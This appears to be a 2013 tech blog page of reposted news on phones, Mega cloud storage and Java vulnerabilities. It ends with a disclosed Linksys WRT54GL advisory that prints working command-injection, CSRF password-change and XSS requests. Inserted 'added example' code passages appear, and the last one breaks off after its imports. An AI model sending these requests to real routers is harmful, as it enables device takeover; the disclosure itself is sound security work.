Jan 23, 2013

Sara Sampaio


Sara Pinto Sampaio (born July 21, 1991) is a Portuguese female model. She won a Portuguese Golden Globe in 2011 and 2012 as "Best Female Model" in her country. She is one of the most prestigious Portuguese models and has appeared on the covers of major magazines distributed worldwide.




She became famous after winning the Pantene Hair Contest 2007. She has been photographed for Vogue and Glamour, and for French Elle and Biba. In 2012 she was also on the cover of the April issue of Portuguese Vogue and was chosen to be the image of the international campaign Calzedonia Summer 2012 Mar, whose photographs were taken by Raphael Mazzucco in Greece and Jamaica. In 2013 she appears in the year's first edition of the magazine GQ Portugal, where she is presented as the "eighth wonder of the world".

Exynos 5 Octa Upcoming Galaxy S4

Samsung's upcoming Galaxy S4 handset could be powered by the company's new Exynos 5 Octa system-on-chip processor, if new leaked details are correct.


The processor, which is also believed to power the soon-to-be-released Galaxy Note 3 phablet device, isn't an eight-core chip in the traditional sense: as well as four high-performance processing cores based on ARM's Cortex-A15 design, it apparently includes a further four Cortex-A7 processing cores that offer less power but require less energy to operate. When the smartphone is running a processor-intensive application, such as a 3D game, the high-performance cores activate; when the phone is being used for less intensive work, such as making a call or listening to music, the high-performance cores are deactivated and the low-power cores used instead. However, only one set of four cores can be active at once.

The design is part of a system ARM calls big.LITTLE, similar to the 'companion core' concept found in Nvidia's Tegra 3 and 4 processors, but Samsung is the first company to attempt to launch an eight-core device into smartphones and tablets.

According to details posted to the AnTuTu Benchmark site, the Samsung Galaxy S4 will feature the model number GT-I9500. No other details were made public by the benchmark results, but previous rumours claim that the handset may feature a new 4.99in display with a Full HD 1080p resolution, 2GB of RAM and a high-resolution 13-megapixel rear-facing camera. The handset is expected to launch with Android 4.2 Jelly Bean as its operating system, becoming one of the first non-Nexus devices to feature the latest build of Google's popular mobile platform.

Thus far, Samsung has not commented on the rumours surrounding its Galaxy S4 handset plans. - source

Tegra 4 GPU will outperform the iPad 4's A6X

While few people seem to care about processor speeds on the desktop, it's a hot topic when it comes to mobile processors, and Nvidia has just raised the stakes with its new Tegra 4 processor.


The Tegra 4 has at its heart 72 custom Nvidia GeForce GPU cores, giving it six-times the graphics processing power of the current Tegra 3. Backing up the GPU is a new quad-core variant of ARM's Cortex-A15 CPU, a chip that Nvidia claims "delivers 2.6x faster Web browsing and breakthrough performance for apps."

According to AnandTech, the Tegra 4 processor will have six times the arithmetic logic units (ALUs) that are present in the Tegra 3. If it is assumed that the Tegra 4 GPU cores will operate at 520 MHz -- which is the fastest that the Tegra 3 could go -- this means that the GPU will be capable of 74.8 GFLOPS (billion FLoating-point Operations Per Second) compared to the 71.6 GFLOPS of the PowerVR SGX 554MP4 inside Apple's A6X.

At CES 2013 Nvidia made the assertion that the Tegra 4 will be faster than the A6X both in 3D games and in GLBenchmark, but didn't provide further details on the matter.

This week, GLBenchmark results claiming to show Tegra 4 performance were leaked to the Web, but it appears that these are either fake or relate to prototype versions of the Tegra 4 running at much lower clock speeds.

While this seems to give Nvidia an advantage over Apple, the glory could be short-lived. Imagination Technologies, makers of the PowerVR GPU inside many smartphones and tablets -- including the iPhone and iPad -- have announced that its sixth-generation graphics core can deliver "20x or more" the performance of current-generation hardware while at the same time being five times more efficient.

Things are really starting to heat up in the mobile sector. - source

Jan 22, 2013

Xperia Z Become The Best Camera Phone

Everybody’s getting completely addicted to the cameras on their smartphones, causing phone makers to enter a huge megapixel war. While the battle raged on all of 2012 between the iPhone 5 and Galaxy S3 in terms of camera power, 2013’s got a new gadget that promises to steal the show – the Xperia Z.


When we analyzed the camera power of the Xperia Z against that of the iPhone 5 and Galaxy S3, we surely were amazed at what this 5-inch monster can do! For starters, it does have a higher resolution of 13 MP while the other two phones have 8MP cameras on board. But, it’s not just the higher megapixel count that makes the Xperia Z’s camera stand out.

What sets it apart is Sony’s special Exmor RS sensor, a much more advanced sensor capable of reproducing high quality images. Another interesting feature in the Xperia Z’s camera is its video HDR mode, which lets you record videos in High Dynamic Range mode as well – definitely a first for phone cameras.

The Xperia Z also has a Superior Auto mode, which users of Sony digital cameras would find familiar. Also included is the Sweep Panorama mode, which makes clicking panoramic images literally a breeze!

You can adjust many features of the camera, including the resolution, white balance, timer, ISO, flash, exposure and some others like HDR, smile shutter, and even focus mode. When you’ve got it in your hands, you can easily be forgiven for thinking of it as a digital camera and not just a phone camera.

We also love the album app in the Xperia Z, which organizes thumbnail previews of the images you’ve clicked very nicely. Organized by date, it lets you browse through your picture library so easily, finding images becomes so much faster on this device. You can also display the images on a globe, thanks to the geotag feature, which will then pin your images based on the locations they were clicked in. - source

50GBs Free Cloud Storage From Mega

Hungry for more than the 5GBs of free cloud storage offered by Google Drive, Microsoft SkyDrive, Dropbox, MediaFire and others? Not anymore. Mega has just launched a free cloud storage offering that is ten (10) times bigger than those mentioned above.


Who wouldn't want 50GBs of free Internet storage? Dropbox is all fine and well, but it starts with a mere 2GBs of free space. Kim Dotcom's newly launched Mega cloud storage service with its free 50GBs of storage sounds much better, but how well does it really work? Let me open by saying it's a long, long way from perfect.

To get your free 50GBs of storage, you first must register your account with a valid e-mail address. Once you've done this—and it may take a while since the system is heavily over-burdened—you'll get a link to use to login to Mega.

You can use just about any Web browser to access your new storage so long as it's actively supporting JavaScript. Mega recommends Chrome, but I was also able to use it with Firefox. However, Internet Explorer 10, Windows 8's default browser, is known to freeze up after uploading approximately 100MBs of files.

Even with Chrome, I found the site often locked up on me. In particular, Mega promises that, if you don't close your current browser session, you can restart interrupted uploads and downloads. It didn't work for me. I will say, however, that getting an estimated upload time of infinity was one of the more amusing error messages I've ever seen.

Once you make it into Mega you're presented with a typical file/folder style display. You can upload both single files or folders. You can also download files at the same time as you're uploading others. Unlike more sophisticated cloud storage services, such as Dropbox, Mega's storage won't integrate with your file system. You can only access your files via a Web browser.

That may change soon. Mega is opening its application programming interface (API). The functionality already appears to be there to integrate Mega with your PC's existing file system.

For now, you can either drag and drop files into Mega from your file manager or use the site's upload buttons. If you're using Chrome, you can also try to drag and drop directories. Regardless of how you do it, be ready for long waits. In these early days, Mega is anything but fast.

Once loaded, you can right-click on a file to get a link for it or to download, rename, move, copy, delete, or reload it. You will also be able to drag and drop your files into new Mega folders.

Mega does indeed appear to give you 50GBs of free storage. Your files, however, may not be the files that are actually stored on the cloud.

To quote from Mega's terms of service, "Our service may automatically delete a piece of data you upload or give someone else access to where it determines that that data is an exact duplicate of original data already on our service. In that case, you will access that original data." So, for example, if you 'saved' a copy of Star Wars to Mega and someone else had uploaded the exact same video, only his copy would be saved and when you accessed "your" copy, you'd really be watching "his" copy.

There's nothing new about this of course. Apple uses the method with iTunes Match as does Amazon with its Cloud Player service. What we don't know, however, is how Mega does it because Mega also only stores encrypted files and the company states that it doesn't have access to your encryption key.

To be exact, when you get a Mega account, you choose a password. This password also serves as your symmetric encryption key. By symmetric Mega means you use the same Advanced Encryption Standard (AES) 128-bit key that's been derived from your password to both encrypt and decrypt your files and folders. This coding and decoding is all done on your computer.

Indeed, Mega doesn't keep your password/encryption key at all. If you lose your password, or it's hacked, Mega can't help you. Your files will be, for all practical purposes, toast. Even if you know for a fact that you'll never forget your password, "password," you may find that you can't log in anyway. While it didn't happen to me, I've heard reports of users finding they couldn't log back in even though they knew they were using the right, simple password.

So, how can Mega know that your files are an exact duplicate of another user's? We don't know. There are many theories, such as these discussed on Ycombinator, but, for now, we're all just speculating.
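How a service could recognise duplicates among files encrypted on the client is left open above; this added example (not from the article and not Mega's code) contrasts the password-derived keys the article describes with convergent encryption, one widely discussed design in which the key is derived from the file contents. PBKDF2 and the HMAC-based keystream are stand-ins for the real key derivation and AES so the example needs only the standard library; all names and sample data are constructed.

```python
import hashlib
import hmac


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Stand-in stream cipher (HMAC-SHA256 in counter mode, NOT AES).
    Applying it twice with the same key and nonce restores the input."""
    out = bytearray()
    for counter, offset in enumerate(range(0, len(data), 32)):
        pad = hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


def password_key(password: str, salt: bytes) -> bytes:
    """128-bit key derived from the account password (PBKDF2 is an assumption)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000, dklen=16)


def encrypt_with_password(password: str, salt: bytes, plaintext: bytes) -> bytes:
    """Model described in the article: each user's key comes from their password."""
    return keystream_xor(password_key(password, salt), salt[:8], plaintext)


def encrypt_convergent(plaintext: bytes) -> bytes:
    """Convergent encryption: the key is a hash of the file itself, so every
    uploader of the same bytes produces the same ciphertext."""
    key = hashlib.sha256(plaintext).digest()[:16]
    return keystream_xor(key, b"\x00" * 8, plaintext)


class DedupStore:
    """Server side: sees ciphertext only and deduplicates by ciphertext hash."""

    def __init__(self):
        self.blobs = {}

    def put(self, ciphertext: bytes) -> bool:
        """Store a blob; return True if an identical blob was already held."""
        digest = hashlib.sha256(ciphertext).hexdigest()
        duplicate = digest in self.blobs
        self.blobs.setdefault(digest, ciphertext)
        return duplicate

    def holds(self, ciphertext: bytes) -> bool:
        return hashlib.sha256(ciphertext).hexdigest() in self.blobs


def run_demo() -> dict:
    movie = b"constructed sample file contents " * 64    # constructed input
    other = b"a file that nobody has uploaded " * 64     # constructed input

    # Two users upload the same file under their own password-derived keys.
    per_user = DedupStore()
    per_user.put(encrypt_with_password("alice-pass", b"alice-salt-01", movie))
    password_dedup = per_user.put(encrypt_with_password("bob-pass", b"bob-salt-0002", movie))

    # The same two uploads under convergent encryption.
    convergent = DedupStore()
    convergent.put(encrypt_convergent(movie))
    convergent_dedup = convergent.put(encrypt_convergent(movie))

    return {
        "password_keys_dedup": password_dedup,
        "convergent_dedup": convergent_dedup,
        "convergent_blobs_stored": len(convergent.blobs),
        # Privacy cost: anyone holding a candidate file can test whether some
        # user stored it, without knowing any password.
        "known_file_confirmed": convergent.holds(encrypt_convergent(movie)),
        "unknown_file_confirmed": convergent.holds(encrypt_convergent(other)),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

With per-user keys the store cannot tell the two uploads apart; with content-derived keys it can, at the price of letting anyone who has a copy of a file confirm that the file is stored.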

Personally, I take Mega's warning about the safety of your data seriously: "You must maintain copies of all data stored by you on our service. We do not make any guarantees that there will be no loss of data or the services will be bug free."

That aside, if you want to share your files privately with someone, Mega uses far stronger encryption: 2,048-bit AES asymmetric encryption. This means there's both a public and private key pair. With this you should be able to securely share files with friends.

You can also use this method to share files directories with other users who also have Mega accounts. If you choose to share files or directories this way, you also control how much access your colleagues have to your shared data.

Of course, you should be able to share files with URLs that have your password embedded in them. With these, anyone who has the link can download the file.

I say "should" because once you start trying to use Mega you'll quickly find that the system is totally swamped. Dotcom is well aware of the problem. He tweeted, "The massive global PR around the #Megalaunch is simply too big to handle for our start-up. I apologize for poor service quality." He then added, "We are working 24/7 and expect normal operations within 48 hours. Lesson learned... No fancy launch event for Megabox ;-)"

So, exactly how overwhelmed are they? "If I would tell you how many signups we had since the launch you wouldn't believe it. I can't believe it. So, I won't tell you." Maybe Dotcom can't but what I can tell you is that, at best, I was seeing upload speeds of less than 1-Kilobit per second from my 5-Megabit per second Charter cable Internet connection. A lot of other basic functionality, such as simply being able to obtain the URL of an uploaded file, frequently failed for me.

The long and short of it is that Mega may prove to be a useful, free service... someday. For now, it's very much a work in progress. If you want good, free, and reliable cloud storage today, go to Dropbox, Google Drive, or Microsoft SkyDrive. If you have to have 50GBs of free storage, check out MediaFire's offering. But as for Mega, you'll be better off holding off for at least a week before trying it. You'll be glad you waited. - source

Samsung Galaxy S3 Vs Apple iPhone5 Vs LG Optimus G

The iPhone 5 has failed to make as big a mark as its predecessors, and there’s possibly worse news in store for Apple. 2013 has seen a host of brand new smartphones being launched, even though the year has barely begun. The LG Optimus G, LG’s latest flagship phone, is one such device that could also steal away some of the iPhone 5’s spotlight. So we decided to pit the Optimus G against the iPhone 5 and the current favorite flagship, the Samsung Galaxy S3, to see if it stood a chance in the market.


From the outside: The iPhone 5’s design might get a tad boring, considering it’s been the same since iPhone 4. At first glance, you might not even notice anything different – with its familiar brushed aluminum casing. But, we have to agree, it does give the iPhone a classy and expensive look. We love the Galaxy S3’s rounded pebble-like exterior – it gives it a different look. On the other hand, the Optimus G manages to make its mark even though it doesn’t look as classy as the iPhone – we especially love its Crystal Reflection rear panel.

The iPhone 5 has a 4-inch Retina LCD display with a resolution of 1136X640 pixels. We’ve obviously found the screen size far too small, especially in the age of 5-inch phablets. The Optimus G has a larger 4.7-inch display with a resolution of 768X1280 pixels. The Galaxy S3 has the largest 4.8-inch display among these three, but it has the least resolution of just 306 ppi, which negates the beauty of the large screen. LG seems to have struck a good balance between screen size and resolution on the Optimus G.

On the inside: The iPhone 5 is powered by a 1.3 GHz dual-core Apple A6 processor and 1 GB of RAM. The Galaxy S3 has a slightly more powerful 1.4 GHz processor but only 1 GB of RAM. The Optimus G’s got more power, with its 1.5 GHz quad-core Snapdragon S4 processor and 2 GB of RAM. Both the Galaxy S3 and Optimus G have 32 GB of internal storage as well as a microSD card slot for those who need more storage space – a big disappointment in the iPhone 5.

The OS: We can’t say anything bad about the iOS 6 that’s running the iPhone 5, which has the largest number of apps to choose from. Samsung’s Galaxy S3 runs on Android 4.1 Jelly Bean, which is a massive improvement over the previous ICS version. A major disappointment with the Optimus G is that it runs on Android 4.0. We wonder why LG couldn’t put in the Jelly Bean version instead.

Camera: In terms of front-facing cameras, there isn’t much difference between the iPhone 5 and the Optimus G – the iPhone 5 has a 1.2 MP camera while the Optimus G has a 1.3 MP camera. But the Galaxy S3 has a 1.9 MP front-facing camera, the best among these three. When it comes to the main camera, we love the Optimus G’s 13 MP camera over the iPhone 5’s and the Galaxy S3’s 8 MP offering.

Battery: The iPhone 5 has a 1440 mAh battery which gives it a talktime of about 8 hours. The Optimus G and the Galaxy S3 are the winners in this category with their 2100 mAh battery and 15 hours of talktime.

Connectivity: All these phones offer LTE as well as 3G connectivity. The Optimus G and the Galaxy S3, in addition to WiFi and Bluetooth, also have NFC capabilities – an important feature missing in the iPhone 5. - source

Apple ‘cuts order for iPhone5 parts’ in 2013

Apple has slashed orders for the screens used on its iPhone5 because of weak sales while arch-rival Samsung has sold its 100 millionth Galaxy S device, in a sign of changing fortunes in the mobile market.


The iPhone maker has almost halved its order of liquid-crystal display panels from key suppliers, according to the Japanese newspaper the Nikkei.

Apple has told three suppliers, Japan Display, Sharp and LG Display, that it requires fewer screens, after previously requesting as many as 65 million units for the January to March quarter. Japan Display’s plant in Nomi, a key iPhone supplier, is expected to reduce output temporarily by between 70% and 80%, compared with the October to December period.

The iPhone5 is longer and lighter than previous models, but consumers have been underwhelmed and there have been glitches, notably the flawed maps function.

Apple has dominated the smartphone market with iPhone since its launch in 2007, but Samsung has caught up in recent years, following the launch of the Galaxy S series in May 2010. Last year, the latest model, the Galaxy S III, helped the South Korean firm to leapfrog its US rival to become the world’s top-selling smartphone manufacturer.

Sales of Samsung’s Galaxy S series have reached 100 million in under three years — faster than Apple’s iPhone, which took nearly four years.

Apple’s share price has tumbled by a quarter since September when iPhone5 debuted. In contrast, Samsung’s shares powered to a new record last week.

Both companies are benefiting from the mobile boom as consumers prefer smartphones and tablets to the traditional desktop or personal computer. Research firm Gartner reported today that global sales of PCs slumped 5% in the last three months, to 90.3 million. Gartner said the launch of “compelling low-cost tablets” — such as the Google Nexus and Amazon Kindle Fire — was helping to drive the shift from PC to tablet. - source

Jan 21, 2013

How to Disable Java in the Browser

Below are instructions for disabling Java from whatever Web browser you may use to surf the Web. These instructions were originally posted as a how-to in response to this piece: Zero-Day Java Exploit Debuts in Crimeware.


Update, Jan 10, 10:35 a.m. ET: The latest version of Java 7 (Update 10) includes a feature that makes it simpler to unplug Java from the browser. Oracle has posted instructions on how to use this feature on Windows here. Also, KrebsOnSecurity just published a comprehensive Q&A that seeks to answer some of the most frequently asked questions about the scope of this vulnerability, and steps that users can take to protect themselves.

Original post:

For Windows users:

Mozilla Firefox: From the main menu select Add-ons, and then disable any plugins with the word “Java” in them. Restart the browser.

Google Chrome: Click the wrench icon in the upper right corner of the browser window, then select Settings. In the search results box to the right in the next screen, type “Java”. A box labeled “Content settings” should be highlighted. Click that, and then scroll down to the Plug-ins section. Click the “Disable individual plug-ins” link, find Java in the list, and click the disable link next to it.

Internet Explorer:

Apparently, getting Java unplugged from Internet Explorer is not straightforward. The U.S. Computer Emergency Response Team (USCERT) lists the following steps, which may or may not completely remove Java from IE:

In the Windows Control panel, open the Java item. Select the “Java” tab and click the “View” button. Uncheck “enabled” for any JRE version listed. Note that this method may not work on Vista or newer systems. As an alternative, you may use one of the following techniques:

Click the start key and type “regedit” in the search box. Double-click the regedit program file when it appears.

- Change the HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Plug-in\<version>\UseJava2IExplorer registry value to 0, where <version> is any version of Java on your system. 10.6.2, for example.

If you are running a 32-bit version of Java on a 64-bit platform, you should set the HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Plug-in\<version>\UseJava2IExplorer registry value to 0.

- Run javacpl.exe as administrator, click the “Advanced” tab, select “Microsoft Internet Explorer” in the “Default Java for browsers” section, and press the space bar to uncheck it. This will properly set the above registry value, despite the option being greyed out.

US-CERT has some additional suggestions for removing Java from IE if the above steps do not do the trick. See their advisory for more details.

For Mac users:

Safari: Click Preferences, and then the Security tab (uncheck “Enable Java”).

Google Chrome: Open Preferences, and then type “Java” in the search box. Scroll down to the Plug-ins section, and click the link that says “Disable individual plug-ins.” If you have Java installed, you should see a “disable” link underneath its listing.

Firefox: Click Tools, Add-ons, and disable the Java plugin(s). - source

50% of all website exploits due to Java vulnerabilities

Oracle Corp. said Monday it has released a fix for the flaw in its Java software that raised an alarm from the U.S. Department of Homeland Security last week. Even after the patch was issued, the federal agency continued to recommend that users disable Java in their Web browsers.


"This and previous Java vulnerabilities have been widely targeted by attackers, and new Java vulnerabilities are likely to be discovered," DHS said Monday in an updated alert published on the website of its Computer Emergency Readiness Team. "To defend against this and future Java vulnerabilities, consider disabling Java in Web browsers until adequate updates are available."

The alert follows on the department's warning late Thursday. Java allows programs to run within websites and powers some advertising networks. Users who disable Java may not be able to see portions of websites that display real-time data such as stock prices, graphical menus, weather updates and ads.

A vulnerability in the latest version, Java 7, was "being actively exploited," the department said.

Java 7 was released in 2011. Oracle said installing its "Update 11" will fix the problem.

Security experts said that special code to take advantage of the weakness is being sold on the black market through so-called "Web exploit packs" to Internet abusers who can use it to steal credit card data, personal information or cause other harm.

The packs, sold for upwards of $1,500 apiece, make complex hacker codes available to relative amateurs. This particular flaw even enables hackers to compromise legitimate websites by taking over ad networks. The result: users are redirected to malicious sites where damaging software can be loaded onto their computers.

The sale of the packs means malware exploiting the security gap is "going to be spread across the Internet very quickly," said Liam O'Murchu, a researcher with Symantec Corp. "If you have the opportunity to turn it off, you should."

Oracle said it released two patches — to address the flaw highlighted by the government, as well as another flaw that the government said was "different but equally severe."

As well, the patches set Java's default security level to "high" so that users will automatically be shown a prompt and given a chance to decline malicious software before it loads onto their computers.

Disabling Java completely in browsers has a similar effect, however. When websites appear without crucial functions, users can click a button to turn Java back on.

Making users aware when Java programs are about to be installed gives users a 50/50 chance of avoiding malware, said Kurt Baumgartner, a senior security researcher with Kaspersky Lab.

Many programmers are avoiding Java altogether, and its use in Web browsers is on the decline, he said.

Kaspersky Lab estimated that last year 50 percent of all website exploitations were due to vulnerabilities in Java. Adobe's Acrobat Reader accounted for another 28 percent of vulnerabilities. - source

New Java exploit sells for $5000 on the black web

For Oracle, it's deja vu all over again.

Just days after it released a patch for a serious security flaw discovered last week in its Java programming language, the software is making headlines again because another previously unpublicized flaw in the program threatens the security of millions of PCs that may still have the application running on them.


Oracle released a fix Sunday for a Java flaw so serious that the U.S. Department of Homeland Security recommended that computer users disable the software unless using it was "absolutely necessary."

That advice was repeated Monday by the department's Computer Emergency Readiness Team (US-CERT) even after the patch was made available to users.

Vulnerability for sale

Now it's being reported that an enterprising Black Hat is peddling a new Zero Day vulnerability for the latest version of Java (version 7, update 11) to up to two buyers for $5000 each.


Both weaponized and source code versions of the vulnerability were being offered by the seller, according to security blogger Brian Krebs, who discovered the offer on an exclusive cybercrime forum.

Since Krebs discovered the offer, he said, it has been removed from the crime forum, suggesting the seller found his buyers for the exploit.

"To my mind, this should dispel any illusions that people may harbor about the safety and security of having Java installed on an end-user PC without taking careful steps to isolate the program," Krebs wrote.

This latest Java exploit is worse than the last one because no one knows what it is, according to Bogdan Botezatu, senior e-threat analyst with anti-virus software maker Bitdefender.

In the flaw patched Sunday, he explained, the exploit code was identified by security researchers in some popular malware kits. With the latest flaw, it's only known to the seller.

"The current method of exploitation will likely remain unknown for a bigger timeframe, which will also increase the attackers' windows of opportunity," Botezatu said in an email.

Earlier this week, Botezatu noted in a blog that despite the patch pushed by Oracle on Sunday, cyber criminals continued to exploit the vulnerability on unpatched machines to install ransomware on them.

Oracle's security moves

In addition to addressing the Zero Day vulnerability in Sunday's patch, Oracle also boosted Java's security setting to "high" by default. "That means that right now the user has to authorize the execution of Java applets that are not signed with a valid certificate," explained Jaimie Blasco, manager of AlienVault Labs, in an email.

While that move is a great step toward making Java more secure on a browser, Blasco noted, it is far from a panacea for Java's problems.

"In the past, we have seen that the attackers were able to steal a valid certificate to sign malicious code so it won't surprise me if we see this technique being used," he said.

Because Java appears to be riddled with vulnerabilities, Bitdefender's Botezatu recommends Oracle identify the core components of the software and rewrite it from scratch.

No doubt, more than a little rewriting of the software will be done when Oracle releases the next version of Java scheduled for September. - source

Linksys WRT54GL 1.1 XSS OS Injection


Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco

============ Vulnerable Firmware Releases: ============

Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============

The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.

Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL

============ Shodan Torks ============

Shodan Search: WRT54GL
=> Results 27190 devices

============ Vulnerability Overview: ============

* OS Command Injection
=> parameter: wan_hostname
=> command: `%20ping%20192%2e168%2e178%2e101%20`

The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close

submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:

http://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

=> This setting is stored permanently in the configuration, so it gets executed on every bootup of the device.

* Changing the current password does not require entering the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.


POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF: the password can be changed without knowing the current one, and the attacker is able to activate remote management:

http:///apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* reflected XSS

=> parameter: submit_button

Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0

* stored XSS (Access Restrictions -> Enter Policy Name (place the XSS) -> Summary (script code gets executed))

=> parameter: f_name

Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png

=> Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:


http://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123">&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=

============ Solution ============

Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.

Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013

Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and gave them detailed vulnerability details
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Sent the Beta Agreement back
29.10.2012 - Linksys gives access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA of the new firmware
17.01.2013 - Linksys informed me about the public release of the mostly fixed version (XSS, OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================
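
A defender-side check for the request patterns listed in this advisory, as an added example that is not part of the original advisory or the vendor's firmware: it parses apply.cgi requests (for instance from a proxy or IDS log) and tags the parameter abuses described above. The function name, tag strings and allowlist patterns are assumptions; the sample requests are shortened from the ones on this page, plus one constructed benign request.

```python
import re
from urllib.parse import parse_qs, urlsplit

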